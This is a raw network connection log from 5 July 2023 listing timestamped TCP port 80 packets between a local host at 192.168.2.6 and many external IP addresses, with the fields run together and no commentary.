                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629322052 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629353046 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629355907 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629380941 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.629400969 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.632844925 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.633047104 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.643920898 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.679096937 CEST4971980192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.709712982 CEST80497133.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.734750986 CEST4972080192.168.2.6172.217.16.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.742341995 CEST4972180192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.758023977 CEST8049720172.217.16.179192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.758132935 CEST4972080192.168.2.6172.217.16.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.758646011 CEST4972080192.168.2.6172.217.16.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.761301994 CEST80497183.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.762306929 CEST4971880192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.762795925 CEST4971880192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.775840044 CEST8049719192.241.158.94192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.775926113 CEST4971980192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.776344061 CEST804972162.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.776432037 CEST4972180192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.776432037 CEST4971980192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.776880026 CEST4972180192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.781625986 CEST8049720172.217.16.179192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.810815096 CEST804972162.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.812063932 CEST804972162.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.812189102 CEST4972180192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.833077908 CEST4972180192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.868860006 CEST804972162.122.190.121192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.869185925 CEST4972180192.168.2.662.122.190.121
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.872442961 CEST8049719192.241.158.94192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.872509956 CEST8049719192.241.158.94192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.872586012 CEST4971980192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.883188009 CEST8049720172.217.16.179192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.886343956 CEST4972080192.168.2.6172.217.16.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.898721933 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.898770094 CEST804970859.106.19.204192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.898869991 CEST4970880192.168.2.659.106.19.204
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.917808056 CEST80497183.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.917839050 CEST80497183.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.917921066 CEST4971880192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.926397085 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932601929 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932643890 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932671070 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932703972 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932715893 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932715893 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932739019 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932750940 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932750940 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932775974 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932784081 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932811975 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932845116 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932851076 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932868958 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932893038 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932898045 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.932956934 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.935180902 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.935266018 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.966932058 CEST4971880192.168.2.63.19.116.195
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.043545961 CEST4971980192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.125607014 CEST80497183.19.116.195192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.139913082 CEST8049719192.241.158.94192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.140058994 CEST4971980192.168.2.6192.241.158.94
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215572119 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215642929 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215691090 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215730906 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215739012 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215790033 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215797901 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215797901 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215842962 CEST8049714118.27.125.181192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215851068 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.215918064 CEST4971480192.168.2.6118.27.125.181
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.333545923 CEST4972280192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.335145950 CEST4972380192.168.2.63.64.163.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.353497028 CEST804972280.74.154.6192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.353640079 CEST4972280192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.354120016 CEST4972280192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.355163097 CEST80497233.64.163.50192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.355303049 CEST4972380192.168.2.63.64.163.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.355592966 CEST4972380192.168.2.63.64.163.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.373816013 CEST804972280.74.154.6192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.373842001 CEST804972280.74.154.6192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.373936892 CEST4972280192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.375219107 CEST80497233.64.163.50192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.375523090 CEST80497233.64.163.50192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.375598907 CEST4972380192.168.2.63.64.163.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.420180082 CEST4972280192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.440000057 CEST4972480192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.441404104 CEST4972580192.168.2.6172.67.152.159
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.442167997 CEST804972280.74.154.6192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.442260981 CEST4972280192.168.2.680.74.154.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.458158016 CEST8049725172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.458307028 CEST4972580192.168.2.6172.67.152.159
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.467494965 CEST4972580192.168.2.6172.67.152.159
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.484244108 CEST8049725172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.497159004 CEST4972680192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.528043985 CEST804972689.161.163.246192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.528139114 CEST4972680192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.528897047 CEST4972680192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.558780909 CEST8049725172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.558809042 CEST8049725172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.558820009 CEST8049725172.67.152.159192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.558968067 CEST4972580192.168.2.6172.67.152.159
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.559395075 CEST804972689.161.163.246192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.559993982 CEST804972689.161.163.246192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.560077906 CEST4972680192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.560101032 CEST804972689.161.163.246192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.560172081 CEST4972680192.168.2.689.161.163.246
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.586436033 CEST804972452.71.57.184192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.586652994 CEST4972480192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.731456995 CEST4972480192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.732301950 CEST4972780192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.732383013 CEST4972880192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.751394987 CEST8049728192.124.249.10192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.751532078 CEST4972880192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.774589062 CEST4972880192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.793668985 CEST8049728192.124.249.10192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.793859005 CEST8049728192.124.249.10192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.793943882 CEST4972880192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.812318087 CEST4972880192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.826126099 CEST4972980192.168.2.6172.67.173.200
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.831645966 CEST8049728192.124.249.10192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.834346056 CEST4972880192.168.2.6192.124.249.10
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.842755079 CEST8049729172.67.173.200192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.845386982 CEST4972980192.168.2.6172.67.173.200
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.855180025 CEST4972980192.168.2.6172.67.173.200
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.871818066 CEST8049729172.67.173.200192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.876915932 CEST804972452.71.57.184192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.876956940 CEST804972452.71.57.184192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.877089977 CEST4972480192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.883366108 CEST4972480192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.885355949 CEST8049729172.67.173.200192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.885528088 CEST4972980192.168.2.6172.67.173.200
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.936634064 CEST4973080192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.937271118 CEST4973180192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.006310940 CEST8049727202.254.236.40192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.006762981 CEST4972780192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.006797075 CEST4973280192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.007479906 CEST4972780192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.028702974 CEST804972452.71.57.184192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.035726070 CEST8049731192.252.154.18192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.039768934 CEST4973180192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.044342995 CEST4973180192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.071976900 CEST4973380192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.085094929 CEST804973052.71.57.184192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.085191965 CEST4973080192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.085822105 CEST4973080192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.143002987 CEST8049731192.252.154.18192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.144898891 CEST8049731192.252.154.18192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.146168947 CEST4973180192.168.2.6192.252.154.18
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.173333883 CEST804973269.163.239.62192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.173466921 CEST4973280192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.181899071 CEST4973280192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.198646069 CEST8049733188.165.133.163192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.198769093 CEST4973380192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.200944901 CEST4973380192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.231221914 CEST804973052.71.57.184192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.231296062 CEST804973052.71.57.184192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.231403112 CEST4973080192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.232013941 CEST4973080192.168.2.652.71.57.184
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.244165897 CEST8049733188.165.133.163192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.244226933 CEST8049733188.165.133.163192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.244321108 CEST4973380192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.280759096 CEST8049727202.254.236.40192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.281526089 CEST8049727202.254.236.40192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.281642914 CEST4972780192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.297089100 CEST4973380192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.316900969 CEST8049733188.165.133.163192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.316996098 CEST4973380192.168.2.6188.165.133.163
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.348927975 CEST804973269.163.239.62192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.349549055 CEST804973269.163.239.62192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.349745989 CEST4973280192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.367352009 CEST4972780192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.377516985 CEST804973052.71.57.184192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.416172981 CEST4973280192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.476114035 CEST4973480192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.514718056 CEST8049734185.80.51.179192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.518599033 CEST4973480192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.518979073 CEST4973480192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.557635069 CEST8049734185.80.51.179192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.558015108 CEST8049734185.80.51.179192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.558173895 CEST4973480192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.578805923 CEST4973580192.168.2.6193.166.255.171
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.579476118 CEST4973480192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.583501101 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.583908081 CEST804973269.163.239.62192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.584233999 CEST804973269.163.239.62192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.584331989 CEST4973280192.168.2.669.163.239.62
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.618437052 CEST8049734185.80.51.179192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.618547916 CEST4973480192.168.2.6185.80.51.179
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.624433041 CEST8049735193.166.255.171192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.625227928 CEST4973580192.168.2.6193.166.255.171
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.641565084 CEST8049727202.254.236.40192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.641681910 CEST4972780192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.687911987 CEST4973580192.168.2.6193.166.255.171
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.709418058 CEST8049736108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.709849119 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.733674049 CEST8049735193.166.255.171192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.733736992 CEST8049735193.166.255.171192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.764451981 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.842386961 CEST4973780192.168.2.646.242.238.60
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.872757912 CEST804973746.242.238.60192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.872919083 CEST4973780192.168.2.646.242.238.60
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.887336969 CEST4973780192.168.2.646.242.238.60
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.890152931 CEST8049736108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.895992994 CEST8049736108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.896465063 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.917732000 CEST804973746.242.238.60192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.918661118 CEST804973746.242.238.60192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.923295975 CEST4973780192.168.2.646.242.238.60
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.985728025 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.997771978 CEST4973880192.168.2.672.44.93.236
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:51.130712032 CEST4970980192.168.2.6137.118.26.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:51.130891085 CEST4970780192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:51.333858967 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:51.427618027 CEST4971680192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:51.833942890 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:52.474558115 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006711006 CEST8049736108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006751060 CEST8049736108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006793022 CEST8049736108.167.164.216192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006937027 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006937981 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006937981 CEST4973680192.168.2.6108.167.164.216
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.008822918 CEST4973980192.168.2.666.94.119.160
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.010971069 CEST4974080192.168.2.660.43.154.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.076888084 CEST4974180192.168.2.651.79.51.72
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.122337103 CEST804973872.44.93.236192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.122579098 CEST4973880192.168.2.672.44.93.236
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.135867119 CEST804973966.94.119.160192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.135979891 CEST4973980192.168.2.666.94.119.160
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.151997089 CEST4973880192.168.2.672.44.93.236
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.152436018 CEST4973980192.168.2.666.94.119.160
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.181139946 CEST804974151.79.51.72192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.181248903 CEST4974180192.168.2.651.79.51.72
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.183765888 CEST4974180192.168.2.651.79.51.72
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.207983017 CEST4974280192.168.2.696.127.180.42
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.218300104 CEST804971080.93.82.33192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.218409061 CEST4971080192.168.2.680.93.82.33
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.227664948 CEST4974380192.168.2.677.68.50.105
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.260891914 CEST804974377.68.50.105192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.261008024 CEST4974380192.168.2.677.68.50.105
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.261918068 CEST4974380192.168.2.677.68.50.105
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.279151917 CEST804973872.44.93.236192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.279184103 CEST804973966.94.119.160192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.280348063 CEST804973966.94.119.160192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.280447960 CEST4973980192.168.2.666.94.119.160
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.280674934 CEST804973872.44.93.236192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.280704021 CEST804973872.44.93.236192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.280781984 CEST4973880192.168.2.672.44.93.236
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.280781984 CEST4973880192.168.2.672.44.93.236
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.287827969 CEST804974151.79.51.72192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.287884951 CEST804974151.79.51.72192.168.2.6
